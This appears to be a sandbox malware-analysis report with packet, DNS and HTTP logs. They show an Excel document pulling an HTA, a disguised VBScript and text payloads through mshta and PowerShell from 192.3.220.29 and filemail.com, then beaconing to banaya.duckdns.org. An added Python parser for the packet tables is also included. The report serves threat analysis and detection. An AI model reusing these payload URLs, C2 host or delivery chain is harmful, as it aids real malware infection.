Nov 20, 2024 16:58:30.690018892 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.690634012 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.690793991 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.690855026 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.691720963 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.691867113 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.691940069 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.692828894 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.692874908 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.692950010 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.833997965 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:46.053848982 CET | 6946 | 49176 | 192.3.101.149 | 192.168.2.22
Nov 20, 2024 16:58:46.058504105 CET | 49176 | 6946 | 192.168.2.22 | 192.3.101.149
Nov 20, 2024 16:58:46.178299904 CET | 6946 | 49176 | 192.3.101.149 | 192.168.2.22
Nov 20, 2024 16:59:16.052228928 CET | 6946 | 49176 | 192.3.101.149 | 192.168.2.22
Nov 20, 2024 16:59:16.053899050 CET | 49176 | 6946 | 192.168.2.22 | 192.3.101.149
Nov 20, 2024 16:59:16.180634022 CET | 6946 | 49176 | 192.3.101.149 | 192.168.2.22
Nov 20, 2024 16:59:28.613754034 CET | 49177 | 80 | 192.168.2.22 | 178.237.33.50
Nov 20, 2024 16:59:29.175290108 CET | 49177 | 80 | 192.168.2.22 | 178.237.33.50
Nov 20, 2024 16:59:29.877151966 CET | 49177 | 80 | 192.168.2.22 | 178.237.33.50
Nov 20, 2024 16:59:31.078346014 CET | 49177 | 80 | 192.168.2.22 | 178.237.33.50
Nov 20, 2024 16:59:33.574376106 CET | 49177 | 80 | 192.168.2.22 | 178.237.33.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 16:57:16.955137968 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:17.195640087 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:22.103718996 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:22.248327971 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:22.249465942 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:22.489525080 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:22.489837885 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:22.626312017 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:45.705996990 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:45.963499069 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:45.970781088 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:46.230933905 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:50.816102028 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:51.174544096 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:51.179064035 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:51.535621881 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:57:51.536180973 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:57:51.672034979 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:58:08.688010931 CET | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:58:08.823702097 CET | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:58:08.829360962 CET | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:58:08.964095116 CET | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:58:13.354443073 CET | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:58:13.694565058 CET | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 16:58:17.304562092 CET | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 16:58:17.543587923 CET | 53 | 52781 | 8.8.8.8 | 192.168.2.22
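The TCP and UDP packet tables above are the raw material for spotting which conversation is the download, which one is a periodic check-in, and which connection attempts never got an answer. The following is an added example, not code from the Joe Sandbox report: a parser for packet rows as they come out of a text export of this report, where the five columns are run together without separators, plus a per-flow summary run over rows copied from the two tables above. It assumes the analysis VM is 192.168.2.22 (true of every row here) and that the VM-side port lies in the Windows default dynamic range 49152-65535; that second assumption is what separates a split like 80|49178 from 804|9178, it is not a property of the format, so a row that still admits more than one split raises instead of guessing. The 5-second burst threshold is also an assumption of this example.

```python
"""Parse packet rows from a text export of a Joe Sandbox report and summarise them per flow.

Added example, not part of the report. In a text export the packet tables lose their column
separators, so a row reads "Nov 20, 2024 16:58:46.053848982 CET694649176192.3.101.149192.168.2.22",
i.e. <timestamp> <source port><dest port><source IP><dest IP> run together.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterator, List, NamedTuple, Tuple

LOCAL_IP = "192.168.2.22"  # analysis VM address, taken from the report
DYNAMIC_PORT_MIN = 49152   # Windows default ephemeral range (assumption); it is what disambiguates 80|49178 from 804|9178
BURST_GAP = 5.0            # seconds of silence that separates two bursts (assumption)

# Rows copied from the report's TCP and UDP packet tables (a subset; constructed sample input).
SAMPLE_ROWS = [
    "Nov 20, 2024 16:57:16.955137968 CET5456253192.168.2.228.8.8.8",
    "Nov 20, 2024 16:57:17.195640087 CET53545628.8.8.8192.168.2.22",
    "Nov 20, 2024 16:58:30.497674942 CET8049178192.3.220.29192.168.2.22",
    "Nov 20, 2024 16:58:30.497723103 CET4917880192.168.2.22192.3.220.29",
    "Nov 20, 2024 16:58:46.053848982 CET694649176192.3.101.149192.168.2.22",
    "Nov 20, 2024 16:58:46.058504105 CET491766946192.168.2.22192.3.101.149",
    "Nov 20, 2024 16:58:46.178299904 CET694649176192.3.101.149192.168.2.22",
    "Nov 20, 2024 16:59:16.052228928 CET694649176192.3.101.149192.168.2.22",
    "Nov 20, 2024 16:59:16.053899050 CET491766946192.168.2.22192.3.101.149",
    "Nov 20, 2024 16:59:16.180634022 CET694649176192.3.101.149192.168.2.22",
    "Nov 20, 2024 16:59:28.613754034 CET4917780192.168.2.22178.237.33.50",
    "Nov 20, 2024 16:59:29.175290108 CET4917780192.168.2.22178.237.33.50",
]

# ts is seconds since the epoch with the CET stamp read as UTC; the offset cancels in differences.
Packet = NamedTuple("Packet", [("ts", float), ("sport", int), ("dport", int), ("src", str), ("dst", str)])
# inbound = packets from the remote host to the VM; burst_intervals = seconds between burst starts
FlowSummary = NamedTuple("FlowSummary", [("packets", int), ("inbound", int), ("outbound", int),
                                         ("burst_intervals", List[float])])

def _parse_timestamp(text: str) -> float:
    base, frac = text.split(".")  # strptime's %f takes six digits, the report prints nine
    whole = (datetime.strptime(base, "%b %d, %Y %H:%M:%S") - datetime(1970, 1, 1)).total_seconds()
    return whole + int(frac) / 10 ** len(frac)

def _ip_ok(ip: str) -> bool:
    parts = ip.split(".")
    return len(parts) == 4 and all(p.isdigit() and p == str(int(p)) and int(p) <= 255 for p in parts)

def _split_ips(text: str) -> Iterator[Tuple[str, str]]:
    # Two run-together dotted quads have six dots; only the digit run between the 3rd and 4th dot is ambiguous.
    dots = [i for i, c in enumerate(text) if c == "."]
    if len(dots) != 6:
        return
    for cut in range(dots[2] + 2, dots[3]):
        ip1, ip2 = text[:cut], text[cut:]
        if _ip_ok(ip1) and _ip_ok(ip2):
            yield ip1, ip2

def parse_packet_row(row: str, local_ip: str = LOCAL_IP) -> Packet:
    ts_text, sep, tail = row.strip().partition(" CET")
    if not sep:
        raise ValueError(f"no timestamp in row: {row!r}")
    ts, found = _parse_timestamp(ts_text), []
    for n1 in range(1, 6):  # each port is 1-5 digits with no leading zero
        for n2 in range(1, 6):
            p1, p2 = tail[:n1], tail[n1:n1 + n2]
            if not (p1.isdigit() and p2.isdigit() and p1 == str(int(p1)) and p2 == str(int(p2))):
                continue
            sport, dport = int(p1), int(p2)
            if not (1 <= sport <= 65535 and 1 <= dport <= 65535):
                continue
            for src, dst in _split_ips(tail[n1 + n2:]):
                if (src == local_ip) == (dst == local_ip):  # exactly one side must be the VM
                    continue
                if (sport if src == local_ip else dport) < DYNAMIC_PORT_MIN:
                    continue
                found.append(Packet(ts, sport, dport, src, dst))
    if len(found) != 1:
        raise ValueError(f"{'ambiguous' if found else 'unparseable'} row: {row!r}")
    return found[0]

def flow_key(p: Packet, local_ip: str = LOCAL_IP) -> Tuple[str, int, int]:
    """(remote IP, remote port, VM port): the same key for both directions of a conversation."""
    return (p.dst, p.dport, p.sport) if p.src == local_ip else (p.src, p.sport, p.dport)

def summarise(rows: List[str], local_ip: str = LOCAL_IP) -> Dict[Tuple[str, int, int], FlowSummary]:
    flows: Dict[Tuple[str, int, int], List[Packet]] = defaultdict(list)
    for row in rows:
        pkt = parse_packet_row(row, local_ip)
        flows[flow_key(pkt, local_ip)].append(pkt)
    out = {}
    for key, pkts in flows.items():
        pkts.sort(key=lambda p: p.ts)
        starts = [pkts[0].ts]  # first packet of each burst; a steady gap between bursts is what beaconing looks like
        for a, b in zip(pkts, pkts[1:]):
            if b.ts - a.ts > BURST_GAP:
                starts.append(b.ts)
        inbound = sum(1 for p in pkts if p.dst == local_ip)
        out[key] = FlowSummary(len(pkts), inbound, len(pkts) - inbound,
                               [round(b - a, 1) for a, b in zip(starts, starts[1:])])
    return out

if __name__ == "__main__":
    for (ip, port, vm_port), s in sorted(summarise(SAMPLE_ROWS).items()):
        print(f"{ip}:{port} <-> VM:{vm_port} pkts={s.packets} in={s.inbound} out={s.outbound} bursts={s.burst_intervals}")
```

On the subset embedded above, the 192.3.101.149:6946 conversation comes out as two bursts 30.0 s apart, the kind of interval worth comparing against the C2 address in the report's extracted malware configuration, while the packets to 178.237.33.50:80 have no reply in the rows above. Feeding the parser the full tables instead of the subset is a matter of pasting the rows into SAMPLE_ROWS.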
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 16:57:16.955137968 CET | 192.168.2.22 | 8.8.8.8 | 0x5992 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:22.103718996 CET | 192.168.2.22 | 8.8.8.8 | 0x5490 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:22.249465942 CET | 192.168.2.22 | 8.8.8.8 | 0x5490 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:22.489837885 CET | 192.168.2.22 | 8.8.8.8 | 0x5490 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:45.705996990 CET | 192.168.2.22 | 8.8.8.8 | 0x766 | Standard query (0) | 1017.filemail.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:45.970781088 CET | 192.168.2.22 | 8.8.8.8 | 0xebfc | Standard query (0) | 1017.filemail.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:50.816102028 CET | 192.168.2.22 | 8.8.8.8 | 0x8e21 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:51.179064035 CET | 192.168.2.22 | 8.8.8.8 | 0x8e21 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:51.536180973 CET | 192.168.2.22 | 8.8.8.8 | 0x8e21 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:08.688010931 CET | 192.168.2.22 | 8.8.8.8 | 0xa309 | Standard query (0) | 1017.filemail.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:08.829360962 CET | 192.168.2.22 | 8.8.8.8 | 0x9360 | Standard query (0) | 1017.filemail.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:13.354443073 CET | 192.168.2.22 | 8.8.8.8 | 0xf720 | Standard query (0) | banaya.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:17.304562092 CET | 192.168.2.22 | 8.8.8.8 | 0xa8c8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 16:57:17.195640087 CET | 8.8.8.8 | 192.168.2.22 | 0x5992 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:22.248327971 CET | 8.8.8.8 | 192.168.2.22 | 0x5490 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:22.489525080 CET | 8.8.8.8 | 192.168.2.22 | 0x5490 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:22.626312017 CET | 8.8.8.8 | 192.168.2.22 | 0x5490 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:45.963499069 CET | 8.8.8.8 | 192.168.2.22 | 0x766 | No error (0) | 1017.filemail.com | ip.1017.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 16:57:45.963499069 CET | 8.8.8.8 | 192.168.2.22 | 0x766 | No error (0) | ip.1017.filemail.com | | 142.215.209.78 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:46.230933905 CET | 8.8.8.8 | 192.168.2.22 | 0xebfc | No error (0) | 1017.filemail.com | ip.1017.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 16:57:46.230933905 CET | 8.8.8.8 | 192.168.2.22 | 0xebfc | No error (0) | ip.1017.filemail.com | | 142.215.209.78 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:51.174544096 CET | 8.8.8.8 | 192.168.2.22 | 0x8e21 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:51.535621881 CET | 8.8.8.8 | 192.168.2.22 | 0x8e21 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:57:51.672034979 CET | 8.8.8.8 | 192.168.2.22 | 0x8e21 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:08.823702097 CET | 8.8.8.8 | 192.168.2.22 | 0xa309 | No error (0) | 1017.filemail.com | ip.1017.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 16:58:08.823702097 CET | 8.8.8.8 | 192.168.2.22 | 0xa309 | No error (0) | ip.1017.filemail.com | | 142.215.209.78 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:08.964095116 CET | 8.8.8.8 | 192.168.2.22 | 0x9360 | No error (0) | 1017.filemail.com | ip.1017.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 16:58:08.964095116 CET | 8.8.8.8 | 192.168.2.22 | 0x9360 | No error (0) | ip.1017.filemail.com | | 142.215.209.78 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:13.694565058 CET | 8.8.8.8 | 192.168.2.22 | 0xf720 | No error (0) | banaya.duckdns.org | | 192.3.101.149 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:58:17.543587923 CET | 8.8.8.8 | 192.168.2.22 | 0xa8c8 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• provit.uk
• 1017.filemail.com
• 192.3.220.29
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 192.3.220.29 | 80 | 3552 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 16:57:19.223304987 CET | 373 | OUT | GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.220.29
Connection: Keep-Alive
Nov 20, 2024 16:57:20.441879988 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 15:57:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 20 Nov 2024 07:47:08 GMT
ETag: "5a0de-627535b5bef4e"
Accept-Ranges: bytes
Content-Length: 368862
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49166 | 192.3.220.29 | 80 | 3844 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 16:57:25.692431927 CET | 450 | OUT | GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Range: bytes=8896-
Connection: Keep-Alive
Host: 192.3.220.29
If-Range: "5a0de-627535b5bef4e"
Nov 20, 2024 16:57:26.890983105 CET | 1236 | IN | HTTP/1.1 206 Partial Content
Date: Wed, 20 Nov 2024 15:57:25 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 20 Nov 2024 07:47:08 GMT
ETag: "5a0de-627535b5bef4e"
Accept-Ranges: bytes
Content-Length: 359966
Content-Range: bytes 8896-368861/368862
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49167 | 192.3.220.29 | 80 | 3976 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 16:57:35.642501116 CET | 381 | OUT | GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 192.3.220.29
    Connection: Keep-Alive
Nov 20, 2024 16:57:36.883152962 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 15:57:35 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Wed, 20 Nov 2024 06:26:54 GMT
    ETag: "22c82-627523c6ee3e7"
    Accept-Ranges: bytes
    Content-Length: 142466
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: image/tiff
    Data Ascii:
    Function restivo(ByVal ambarino, ByVal pneometria, ByVal contramartelos)
        Dim esfalfamento
        esfalfamento = InStr(ambarino, pneometria)
        Do While esfalfamento > 0
            ambarino = Left(ambarino, esfalfamento - 1) & contramartelos & Mid(ambarino, esfalfamento + Len(pneometria))
            esfalfamento = InStr(esfalfamento + Len(contramartelos), ambarino, pneometria)
        Loop
        restivo = ambarino
    End Function
    private fun


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49173 | 192.3.220.29 | 80 | 3652 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 16:57:54.702392101 CET | 485 | OUT | GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    If-Modified-Since: Wed, 20 Nov 2024 07:47:08 GMT
    Connection: Keep-Alive
    Host: 192.3.220.29
    If-None-Match: "5a0de-627535b5bef4e"
Nov 20, 2024 16:57:55.899717093 CET | 275 | IN | HTTP/1.1 304 Not Modified
    Date: Wed, 20 Nov 2024 15:57:54 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Wed, 20 Nov 2024 07:47:08 GMT
    ETag: "5a0de-627535b5bef4e"
    Accept-Ranges: bytes
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49175 | 192.3.220.29 | 80 | 1712 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 16:58:10.746967077 CET | 75 | OUT | GET /45/HDRDDG.txt HTTP/1.1
    Host: 192.3.220.29
    Connection: Keep-Alive
Nov 20, 2024 16:58:11.865583897 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 15:58:10 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Wed, 20 Nov 2024 06:25:06 GMT
    ETag: "a0800-6275235f113e8"
    Accept-Ranges: bytes
    Content-Length: 657408
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49177 | 178.237.33.50 | 80 | 800 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 16:58:17.770757914 CET | 71 | OUT | GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Nov 20, 2024 16:58:19.031322002 CET | 1170 | IN | HTTP/1.1 200 OK
    date: Wed, 20 Nov 2024 15:58:18 GMT
    server: Apache
    content-length: 962
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
    Data Ascii:
    {
      "geoplugin_request":"8.46.123.75",
      "geoplugin_status":200,
      "geoplugin_delay":"1ms",
      "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
      "geoplugin_city":"New York",
      "geoplugin_region":"New York",
      "geoplugin_regionCode":"NY",
      "geoplugin_regionName":"New York",
      "geoplugin_areaCode":"",
      "geoplugin_dmaCode":"501",
      "geoplugin_countryCode":"US",
      "geoplugin_countryName":"United States",
      "geoplugin_inEU":0,
      "geoplugin_euVATrate":false,
      "geoplugin_continentCode":"NA",
      "geoplugin_continentName":"North America",
      "geoplugin_latitude":"40.7123",
      "geoplugin_longitude":"-74.0068",
      "geoplugin_locationAccuracyRadius":"20",
      "geoplugin_timezone":"America\/New_York",
      "geoplugin_currencyCode":"USD",
      "geoplugin_currencySymbol":"$",
      "geoplugin_currencySymbol_UTF8":"$",
      "geoplugin_currencyConverter":0
    }


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            6 | 192.168.2.22 | 49178 | 192.3.220.29 | 80 | 2144 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 20, 2024 16:58:28.084156036 CET | 75 | OUT | GET /45/HDRDDG.txt HTTP/1.1
                                                                                                            Host: 192.3.220.29
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 16:58:29.247379065 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 15:58:28 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                            Last-Modified: Wed, 20 Nov 2024 06:25:06 GMT
                                                                                                            ETag: "a0800-6275235f113e8"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 657408
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: text/plain


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            0 | 192.168.2.22 | 49163 | 198.244.140.41 | 443 | 3552 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2024-11-20 15:57:18 UTC | 388 | OUT | GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: provit.uk
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:57:19 UTC | 443 | IN | HTTP/1.1 302 Found
                                                                                                            Content-Length: 96
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Date: Wed, 20 Nov 2024 15:57:18 GMT
                                                                                                            Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                            Vary: Accept
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                            X-Download-Options: noopen
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Xss-Protection: 0
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:57:19 UTC | 96 | IN | Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            1 | 192.168.2.22 | 49165 | 198.244.140.41 | 443 | 3844 | C:\Windows\System32\mshta.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2024-11-20 15:57:24 UTC | 412 | OUT | GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: provit.uk
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:57:24 UTC | 443 | IN | HTTP/1.1 302 Found
                                                                                                            Content-Length: 96
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Date: Wed, 20 Nov 2024 15:57:24 GMT
                                                                                                            Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                            Vary: Accept
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                            X-Download-Options: noopen
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Xss-Protection: 0
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:57:24 UTC | 96 | IN | Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            2 | 192.168.2.22 | 49168 | 142.215.209.78 | 443 | 1712 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2024-11-20 15:57:48 UTC | 192 | OUT | GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                            Host: 1017.filemail.com
                                                                                                            Connection: Keep-Alive
